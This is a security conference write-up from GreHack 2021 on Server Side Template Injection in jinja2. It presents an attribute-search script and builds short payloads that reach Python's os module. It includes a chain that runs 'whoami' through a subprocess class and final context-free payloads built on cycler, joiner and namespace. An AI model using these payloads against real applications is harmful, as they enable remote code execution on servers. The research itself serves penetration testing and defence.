GreHack 2021 - Optimizing Server Side Template Injections payloads for jinja2
Introduction
When attacking Python-based web applications, we often need to find a way to execute commands on the server and escape from the application context. To reach the underlying Python backend of a web application, an attacker can exploit common vulnerabilities such as Server Side Template Injection (SSTI) or Code Injection (CI). But how can we then escape from this context? In this paper, I present a general approach to this problem: exploring Python modules and Python objects to find paths to high-value targets, such as the os module or built-in functions. I will then use this technique to create the shortest payloads that access the os module in Python's jinja2 template engine.
- Recorded talk (MP4) : GreHack_2021_-_Optimizing_Server_Side_Template_Injections_payloads_for_jinja2.mp4
- Paper (PDF) : GreHack_2021_-_Optimizing_Server_Side_Template_Injections_payloads_for_jinja2 paper.pdf
- Slides (PDF) : GreHack_2021_-_Optimizing_Server_Side_Template_Injections_payloads_for_jinja2 slides.pdf
- Live talk on YouTube : https://www.youtube.com/watch?v=2dS34u3T-80&t=25425s
Server Side Template Injections
Server Side Template Injection (SSTI) vulnerabilities occur when an attacker can modify the template code before it is rendered by the template engine. This can happen in many ways: by mixing format strings and templates, by obtaining write access to the template files, through a file upload vulnerability, and so on.
When an attacker finds a Server Side Template Injection, they will try to inject template code that abuses the template engine to gain access to the underlying machine and achieve Remote Code Execution (RCE).
Finding a path between two modules
First, let's see what a path from one module to another looks like. With a bit of research, code review and testing, we can find a path from the jinja2 module to the os module by hand. This is slow, as we often need to read the module's source code to move forward. We can test this path and check that the os module is reachable from the jinja2 module:
>>> import jinja2
>>> jinja2.bccache.tempfile._os
<module 'os' from '/usr/lib/python3.8/os.py'>
>>>
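Such a dotted path is nothing more than a chain of attribute lookups. Here is a minimal sketch of that idea, using the standard library tempfile module as the starting point so that it runs without jinja2 installed (the helper name resolve_path is hypothetical and not part of the original tooling):

```python
import importlib
import os

def resolve_path(dotted_path):
    """Follow a dotted path such as 'tempfile._os' one attribute at a time."""
    root_name, *attributes = dotted_path.split(".")
    obj = importlib.import_module(root_name)  # import the starting module
    for name in attributes:
        obj = getattr(obj, name)  # each step is a plain attribute lookup
    return obj

# tempfile does "import os as _os", so this path ends on the os module itself
print(resolve_path("tempfile._os") is os)
```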
Python internals
In Python, every value is an object. Python classes and objects have very interesting internal (special) methods and attributes, whose names start and end with two underscores (__). Some of these internal functions are called when the object is converted to another type or representation ('__bool__', '__float__', '__int__', '__repr__', ...), and some of them implement comparisons ('__eq__', '__ge__', '__gt__', '__le__', '__lt__', '__ne__', ...). We can list all of the attributes (functions, internal functions, variables) of a Python object with the dir() function. Here is an example of the attributes of an int object:
>>> dir(int(0))
['__abs__', '__add__', '__and__', '__bool__', '__ceil__', '__class__', '__delattr__', '__dir__', '__divmod__', '__doc__', '__eq__', '__float__', '__floor__', '__floordiv__', '__format__', '__ge__', '__getattribute__', '__getnewargs__', '__gt__', '__hash__', '__index__', '__init__', '__init_subclass__', '__int__', '__invert__', '__le__', '__lshift__', '__lt__', '__mod__', '__mul__', '__ne__', '__neg__', '__new__', '__or__', '__pos__', '__pow__', '__radd__', '__rand__', '__rdivmod__', '__reduce__', '__reduce_ex__', '__repr__', '__rfloordiv__', '__rlshift__', '__rmod__', '__rmul__', '__ror__', '__round__', '__rpow__', '__rrshift__', '__rshift__', '__rsub__', '__rtruediv__', '__rxor__', '__setattr__', '__sizeof__', '__str__', '__sub__', '__subclasshook__', '__truediv__', '__trunc__', '__xor__', 'as_integer_ratio', 'bit_length', 'conjugate', 'denominator', 'from_bytes', 'imag', 'numerator', 'real', 'to_bytes']
>>>
As we can see, this object has many attributes, most of them internal functions. These functions are called when casting objects. For example, str(int(17)) calls the internal __str__ function, which for int falls back to __repr__, so the result is the same as calling int(17).__repr__() directly:
>>> str(int(17))
'17'
>>> int(17).__repr__()
'17'
>>>
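To see which internal function is actually called, we can define both on a small class. This is an illustrative sketch (the Temperature and ReprOnly classes are made up for the example): str() looks for __str__ first and only ends up in __repr__ when a class does not define its own __str__, which is the case for int.

```python
class Temperature:
    def __init__(self, degrees):
        self.degrees = degrees

    def __repr__(self):
        return "Temperature(%d)" % self.degrees

    def __str__(self):
        return "%d degrees" % self.degrees

class ReprOnly:
    def __repr__(self):
        return "ReprOnly()"

t = Temperature(17)
print(str(t))           # uses __str__
print(repr(t))          # uses __repr__
print(str(ReprOnly()))  # no custom __str__, so __repr__ is used
```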
From these functions and attributes, we can reach further attributes, such as other functions, variables or sub-modules. Here is an example of the sub-attributes of the __init__ method of the previous int(0) object:
>>> dir(int(0).__init__)
['__call__', '__class__', '__delattr__', '__dir__', '__doc__', '__eq__', '__format__', '__ge__', '__getattribute__', '__gt__', '__hash__', '__init__', '__init_subclass__', '__le__', '__lt__', '__name__', '__ne__', '__new__', '__objclass__', '__qualname__', '__reduce__', '__reduce_ex__', '__repr__', '__self__', '__setattr__', '__sizeof__', '__str__', '__subclasshook__', '__text_signature__']
All of these attributes can be chained to access one object from another. This is the core concept behind most payloads used in Server Side Template Injection (SSTI) exploits today, like this one:
{{ ''.__class__.mro()[1].__subclasses__()[396]('whoami', shell=True, stdout=-1).communicate()[0].strip() }}
This type of payload can cause various problems because it is highly context dependent. Indeed, the indexes in "...__class__.mro()[1].__subclasses__()[396]..." select entries from lists that are built at runtime: the position of a given class in __subclasses__() can vary depending on the Python version, the version of jinja2 and the modules loaded by the application.
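The fragility of such a hard-coded index is easy to observe. The sketch below (plain Python, outside of any template) looks a class up by name instead of by position. Using subprocess.Popen is an assumption about what index 396 was meant to select, based on the arguments passed in the payload:

```python
import subprocess  # makes sure the Popen class is loaded

# Same object chain as the payload: str -> object -> all direct subclasses
subclasses = ''.__class__.mro()[1].__subclasses__()

# Look the class up by module and name instead of relying on a fixed position
index = next(
    i for i, cls in enumerate(subclasses)
    if cls.__module__ == "subprocess" and cls.__name__ == "Popen"
)

print(len(subclasses))             # differs between interpreters and applications
print(subclasses[index].__name__)  # the class found at the computed index
```

The computed index changes as soon as a different set of modules is imported, which is why a fixed number rarely survives a change of target.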
We can find one path from the jinja2 module to the os module by hand, but we simply cannot test every possible path by hand. So, what is next?
Breadth first search in Python objects
In order to create a general algorithm that explores Python objects and extracts high-value targets for exploits, we first need to define which targets we want to find. We will consider modules and built-in functions as priority targets, as they form the basis of a successful exploitation. These two kinds of objects are represented as strings by the __repr__ function as follows:
- Modules : represented by strings like <module 'os' from '/usr/lib/python3.8/os.py'>
- Built-in functions : represented by strings like <built-in function open>
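These string forms can be checked directly in the interpreter. As a side note, the types module offers an alternative to string matching. Using isinstance() here is a suggestion of this sketch, not what the search function in this article does:

```python
import os
import types

print(repr(os))    # starts with "<module 'os'"
print(repr(open))  # "<built-in function open>"

# Extract the module name from the text between the first pair of quotes
module_name = repr(os).split("<module '")[1].split("'")[0]

# Type-based checks that do not depend on the string representation
is_module = isinstance(os, types.ModuleType)
is_builtin = isinstance(open, types.BuiltinFunctionType)
print(module_name, is_module, is_builtin)
```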
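The first approach to this problem is to write a recursive function that searches the attribute tree down to a maximum depth. This function retrieves all the sub-attributes of an object and recursively explores them as well. Note that, because it recurses into each attribute before moving on to the next one, this implementation actually visits objects in depth-first order; the depth limit is what keeps the search bounded.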
def find_path_to_modules(obj, found=None, path=None, depth=0, maxdepth=3):
    # None defaults avoid sharing mutable default arguments between calls
    if found is None: found = {}
    if path is None: path = []
    if "modules" not in found.keys():
        found["modules"] = {}
    if depth < maxdepth:
        for subkey in dir(obj):
            try:
                # getattr() is equivalent to evaluating "obj.<subkey>"
                subobj = getattr(obj, subkey)
                if str(subobj).startswith("<module '"):
                    modulename = str(subobj).split("<module '")[1].split("'")[0]
                    print("\r[>] Found module '%s' at %s" % (modulename, '.'.join(path+[subkey])))
                    if modulename not in found["modules"].keys():
                        found["modules"][modulename] = []
                    # Record the dotted path that leads to this module
                    found["modules"][modulename].append('.'.join(path+[subkey]))
                # Explore further
                find_path_to_modules(subobj, found=found, path=path+[subkey], depth=(depth+1), maxdepth=maxdepth)
            except AttributeError as e:
                pass
    return found
This first approach has two issues:
- Cyclic traps : when a sub-attribute of an object refers to the object itself or to one of its parents, the search keeps going around the cycle until the depth limit stops it (and would loop forever without that limit).
- Long exploration time : during the search, we encounter a lot of objects, many of them more than once. Exploring the same objects multiple times wastes a massive amount of time.
Preventing cyclic traps and optimization
In order to prevent cyclic traps, we need to keep track of the objects we have already explored. To do this, we will create a list containing the id of each explored object. The id function returns a unique identifier for the object (in CPython, its address in memory), so two objects that are alive at the same time are guaranteed to be different if their id() differs.
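A concrete cycle exists in the standard library: os exposes os.path, and that module imports os again. The sketch below shows how a list of ids cuts the cycle (the visit helper is hypothetical and only follows one fixed attribute chain):

```python
import os

# os.path is a module that itself does "import os": a cycle in the object graph
print(os.path.os is os)
print(id(os.path.os) == id(os))

known_ids = []
visited_names = []

def visit(obj, name):
    """Record obj unless its id has been seen before; return True if it is new."""
    if id(obj) in known_ids:
        return False
    known_ids.append(id(obj))
    visited_names.append(name)
    return True

visit(os, "os")
visit(os.path, "os.path")
revisited = visit(os.path.os, "os.path.os")  # same object as os: skipped
print(visited_names, revisited)
```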
General algorithm to find modules from a Python object
The general algorithm we will use is a recursive function that searches the attribute tree down to a maximum depth. This function retrieves all the sub-attributes of an object and recursively explores them as well. At each step, it stores the id() of the object to avoid falling into cyclic traps.
def find_path_to_modules(obj, found=None, path=None, knownids=None, depth=0, maxdepth=3, verbose=False):
    # None defaults avoid sharing mutable default arguments between calls
    if found is None: found = {}
    if path is None: path = []
    if knownids is None: knownids = []
    if "modules" not in found.keys(): found["modules"] = {}
    if depth < maxdepth:
        for subkey in dir(obj):
            if verbose == True:
                print("\r\x1b[2K%s" % '.'.join(path+[subkey]), end="")
            if type(subkey) in [bool]:
                continue
            try:
                # getattr() is equivalent to evaluating "obj.<subkey>"
                subobj = getattr(obj, subkey)
                if str(subobj).startswith("<module '"):
                    modulename = str(subobj).split("<module '")[1].split("'")[0]
                    print("\r[>] Found module '%s' at %s" % (modulename, '.'.join(path+[subkey])))
                    if modulename not in found["modules"].keys():
                        found["modules"][modulename] = []
                    # shorten_module_paths() is a helper that is not shown in this article;
                    # path[0] is expected to be the name of the starting object (e.g. 'jinja2'),
                    # so the function must be called with a non-empty path
                    found["modules"][modulename] = shorten_module_paths(
                        path[0],
                        modulename,
                        found["modules"][modulename] + ['.'.join(path+[subkey])]
                    )
                # Explore further, skipping objects that were already visited
                if id(subobj) not in knownids:
                    knownids.append(id(subobj))
                    find_path_to_modules(
                        subobj,
                        found=found,
                        path=path+[subkey],
                        knownids=knownids,
                        depth=(depth+1),
                        maxdepth=maxdepth,
                        verbose=verbose
                    )
            except AttributeError as e:
                pass
    return found
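For comparison, here is a minimal sketch of the same idea written as a true breadth-first search with an explicit queue. It is not the tool used to produce the results in this article: the function name find_module_paths is hypothetical, modules are detected with isinstance() instead of string matching, and only the first (shortest) path to each module is kept. It is run on the standard library tempfile module so that it works without jinja2:

```python
import collections
import tempfile
import types

def find_module_paths(root, root_name, max_depth=2):
    """Breadth-first search over attributes; returns {module name: shortest path}."""
    found = {}
    seen = {id(root): root}  # keeping the objects alive prevents id() reuse
    queue = collections.deque([(root, [root_name], 0)])
    while queue:
        obj, path, depth = queue.popleft()
        if depth >= max_depth:
            continue  # depth limit reached, do not expand this object
        for name in dir(obj):
            try:
                child = getattr(obj, name)
            except Exception:
                continue  # some attributes raise when they are accessed
            child_path = path + [name]
            if isinstance(child, types.ModuleType):
                # The queue is processed level by level, so the first hit is a shortest path
                found.setdefault(child.__name__, ".".join(child_path))
            if id(child) not in seen:
                seen[id(child)] = child
                queue.append((child, child_path, depth + 1))
    return found

paths = find_module_paths(tempfile, "tempfile")
print(paths["os"])  # tempfile._os
```

Storing the visited objects in a dictionary keyed by id() keeps them alive for the duration of the search, which sidesteps the fact that an id can be reused once an object has been garbage collected.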
Constructing payloads for jinja2
The TemplateReference object in jinja2
In jinja2 templates, we can use the TemplateReference object to reuse code blocks from the template. For example, to avoid rewriting the title everywhere in the template, we can define the title in a {% block title %} block and retrieve it with {{ self.title() }} later:
>>> msg = jinja2.Template("""
... <title>{% block title %}This is a title{% endblock %}</title>
... <h1>{{ self.title() }}</h1>
... """).render()
>>> print(msg)
<title>This is a title</title>
<h1>This is a title</h1>
>>>
Access to the TemplateReference object is context-free: it comes with no requirements other than being inside a jinja2 template. This is exactly where we would be able to inject code if we managed to get a Server Side Template Injection (SSTI) on a web application. We can get direct access to the TemplateReference object through a simple {{ self }} in a template:
>>> jinja2.Template("My name is {{ self }}").render()
'My name is <TemplateReference None>'
>>>
TemplateReference object to os module
Using the general algorithm described above with jinja2 as the starting point for the search, we get very interesting results for the paths to the os module:
{
    "modules": {
        ...
        "os": [
            "jinja2.utils.os",
            "jinja2.bccache.tempfile._os",
            "jinja2.bccache.tempfile._shutil.os",
            "jinja2.bccache.fnmatch.os",
            "jinja2.loaders.os",
            "jinja2.environment.os",
            "jinja2.filters.random._os",
            "jinja2.bccache.os"
        ]
    }
    ...
}
These are all the paths found within the search depth through which we can reach the os module from the jinja2 module. Now, let's look at the TemplateReference object to see which attributes we can use. One attribute stands out, _TemplateReference__context:
>>> import jinja2
>>> jinja2.Template("My name is {{ f(self) }}").render(f=dir)
"My name is ['_TemplateReference__context', '__class__', '__delattr__', '__dict__', '__dir__', '__doc__', '__eq__', '__format__', '__ge__', '__getattribute__', '__getitem__', '__gt__', '__hash__', '__init__', '__init_subclass__', '__le__', '__lt__', '__module__', '__ne__', '__new__', '__reduce__', '__reduce_ex__', '__repr__', '__setattr__', '__sizeof__', '__str__', '__subclasshook__', '__weakref__']"
Now, if we print this attribute, we get a Context object wrapping a dictionary with many values:
>>> import jinja2
>>> jinja2.Template("My name is {{ self._TemplateReference__context }}").render(f=dir)
"My name is <Context {'range': <class 'range'>, 'dict': <class 'dict'>, 'lipsum': <function generate_lorem_ipsum at 0x7f9a1cb0a0d0>, 'cycler': <class 'jinja2.utils.Cycler'>, 'joiner': <class 'jinja2.utils.Joiner'>, 'namespace': <class 'jinja2.utils.Namespace'>, 'f': <built-in function dir>} of None>"
This {{ self._TemplateReference__context }} is very interesting because it gives us access to the following classes:
- jinja2.utils.Cycler
- jinja2.utils.Joiner
- jinja2.utils.Namespace
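As a side note on the attribute name used above: _TemplateReference__context looks like the result of Python's name mangling, where an attribute written as self.__context inside a class body is stored as _ClassName__context. The stand-in class below is hypothetical and only mimics this naming; it is not jinja2's actual code:

```python
class Reference:
    """Hypothetical stand-in for a class that keeps a 'private' context."""

    def __init__(self, context):
        # Two leading underscores: Python stores this as _Reference__context
        self.__context = context

ref = Reference({"cycler": "placeholder"})
mangled = [name for name in dir(ref) if name.endswith("__context")]
print(mangled)
print(ref._Reference__context)  # still reachable from outside the class
```

Name mangling only renames the attribute; it does not hide it, which is why the context remains reachable from a template.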
As we have seen before, we can access the os module from jinja2 at the path jinja2.utils.os. Therefore, all we need in order to reach os from the TemplateReference object is access to the global variables of the module that defines one of the classes Cycler, Joiner or Namespace.
This is really simple! We first need to access the __init__ method (the initializer) of the class:
>>> import jinja2
>>> jinja2.Template("My name is {{ self._TemplateReference__context.cycler.__init__ }}").render()
'My name is <function Cycler.__init__ at 0x7f696dd06700>'
Then we access the global variables of this method through __globals__ (these are the global variables declared in utils.py inside jinja2):
>>> import jinja2
>>> jinja2.Template("My name is {{ self._TemplateReference__context.cycler.__init__.__globals__ }}").render()
'My name is {\'__name__\': \'jinja2.utils\', \'__doc__\': None, \'__package__\': \'jinja2\', ... ... \'os\': <module \'os\' from \'/usr/lib/python3.8/os.py\'>, ... ..., \'Cycler\': <class \'jinja2.utils.Cycler\'>, \'Joiner\': <class \'jinja2.utils.Joiner\'>, \'Namespace\': <class \'jinja2.utils.Namespace\'>, \'_\': <function _ at 0x7f696dd06670>, \'have_async_gen\': True, \'soft_unicode\': <function soft_unicode at 0x7f696dd06ca0>}'
And finally, we can access the os module!
>>> import jinja2
>>> jinja2.Template("My name is {{ self._TemplateReference__context.cycler.__init__.__globals__.os }}").render()
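The same chain can be reproduced outside of jinja2 with any class whose __init__ is written in Python. The sketch below uses tempfile.TemporaryDirectory from the standard library as a stand-in for Cycler (an assumption made so that the example runs without jinja2). Note that plain Python needs the ['...'] syntax to read an entry of the __globals__ dictionary, whereas in a jinja2 template .os works because attribute lookups fall back to item lookups:

```python
import os
import tempfile

# __init__ is a regular Python function, so it carries a reference to the
# global namespace of the module in which it was defined (here: tempfile)
module_globals = tempfile.TemporaryDirectory.__init__.__globals__

print(module_globals["__name__"])   # tempfile
print(module_globals["_os"] is os)  # tempfile does "import os as _os"
```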
Context-free payload for Remote Code Execution in jinja2
We now have three context-free payloads that can be used to access the os module from within a jinja2 template:
{{ self._TemplateReference__context.cycler.__init__.__globals__.os }}
{{ self._TemplateReference__context.joiner.__init__.__globals__.os }}
{{ self._TemplateReference__context.namespace.__init__.__globals__.os }}
Let’s render a small template to check if it works:
>>> import jinja2
>>> jinja2.Template("My name is {{ self._TemplateReference__context.cycler.__init__.__globals__.os }}").render()
"My name is <module 'os' from '/usr/lib/python3.8/os.py'>"
These payloads give us a new, quicker way to access the os module in Server Side Template Injection attacks. This will be really useful in bug bounties and penetration tests!
Further optimization
Now that we have completely context-free payloads, we can add a final optimization. To construct these payloads, we explored the Python object tree starting from the TemplateReference object, which is available within jinja2 templates as {{ self }}. Its context holds all the variables available inside the template, including jinja2's default globals. Therefore, we can simplify our payloads by removing self._TemplateReference__context, as joiner, cycler and namespace can be accessed directly from within the template!
Therefore the final context-free payloads to access the os module in jinja2 templates are:
{{ cycler.__init__.__globals__.os }}
{{ joiner.__init__.__globals__.os }}
{{ namespace.__init__.__globals__.os }}
Conclusion
In Server Side Template Injection (SSTI) vulnerabilities, we can inject template code in the web application, which is then rendered as part of the template and executed inside the application context. In order to escape this context and gain Remote Code Execution on the server, we often need to find a way to reach the os Python module.
In order to find generic ways to access the os module, we studied how Python objects and internal functions work, and designed an algorithm capable of exploring Python objects looking for modules without falling into cyclic traps. With this general algorithm, we were able to construct context-free payloads that can be used to achieve Remote Code Execution (RCE) when an attacker has an SSTI in jinja2. Other payloads can also be created to exploit other template engines, such as Mako for example.